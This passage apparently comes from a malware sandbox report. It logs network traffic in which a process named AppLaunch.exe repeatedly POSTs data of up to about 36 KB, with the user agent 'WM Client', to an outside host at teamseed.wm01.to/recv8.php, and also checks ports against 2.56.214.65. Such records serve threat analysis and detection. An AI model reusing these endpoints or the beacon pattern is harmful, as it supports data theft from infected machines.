                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          GET
                          http://2.56.214.65/check.php?port1=56007
                          AppLaunch.exe
                          Remote address:
                          2.56.214.65:80
                          Request
                          GET /check.php?port1=56007 HTTP/1.1
                          Host: 2.56.214.65
                          Response
                          HTTP/1.1 200 OK
                          Date: Sun, 22 Aug 2021 12:49:34 GMT
                          Server: Apache/2.4.29 (Ubuntu)
                          Content-Length: 1
                          Content-Type: text/html; charset=UTF-8
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26493
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35217
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          HEAD
                          http://google.com/
                          chrome.exe
                          Remote address:
                          216.58.214.14:80
                          Request
                          HEAD / HTTP/1.1
                          Host: google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 301 Moved Permanently
                          Location: http://www.google.com/
                          Content-Type: text/html; charset=UTF-8
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Expires: Tue, 21 Sep 2021 12:49:38 GMT
                          Cache-Control: public, max-age=2592000
                          Server: gws
                          Content-Length: 219
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                        • flag-unknown
                          HEAD
                          http://www.google.com/
                          chrome.exe
                          Remote address:
                          172.217.19.196:80
                          Request
                          HEAD / HTTP/1.1
                          Host: www.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: text/html; charset=ISO-8859-1
                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Server: gws
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Transfer-Encoding: chunked
                          Expires: Sun, 22 Aug 2021 12:49:38 GMT
                          Cache-Control: private
                          Set-Cookie: NID=221=Pv-JU3HMQZH0YmZD2f9hTJHow_Mr2PJ6axXLp3bvsrKi8KSwabm0puhFTwttyRmzL9gvrdLCavwI3zzWLwrBDQrwGc0ttgNp3XAsb-mZYEELHK1bxbikALKvFs3W5kU1WTsq8FpgF4fdmvapusU57XPsVZn4lmygvt7LhBUhx1w; expires=Mon, 21-Feb-2022 12:49:38 GMT; path=/; domain=.google.com; HttpOnly
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36001
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36085
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35337
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36193
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26845
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 27037
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26893
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          ApowerREC.exe
                          337 B
                          481 B
                          6
                          4

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          ApowerREC.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          291 B
                          441 B
                          5
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          291 B
                          441 B
                          5
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          3.0kB
                          11
                          8

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.4kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          895 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.3kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.5kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.5kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.7kB
                          831 B
                          35
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.2kB
                          991 B
                          34
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 2.56.214.65:80
                          http://2.56.214.65/check.php?port1=56007
                          http
                          AppLaunch.exe
                          334 B
                          360 B
                          6
                          5

                          HTTP Request

                          GET http://2.56.214.65/check.php?port1=56007

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.4kB
                          831 B
                          28
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.4kB
                          831 B
                          34
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          245 B
                          441 B
                          4
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.2kB
                          991 B
                          35
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.3kB
                          1.1kB
                          35
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.5kB
                          1.2kB
                          34
                          18

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.3kB
                          951 B
                          34
                          13

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.7kB
                          991 B
                          28
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.9kB
                          711 B
                          28
                          7

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
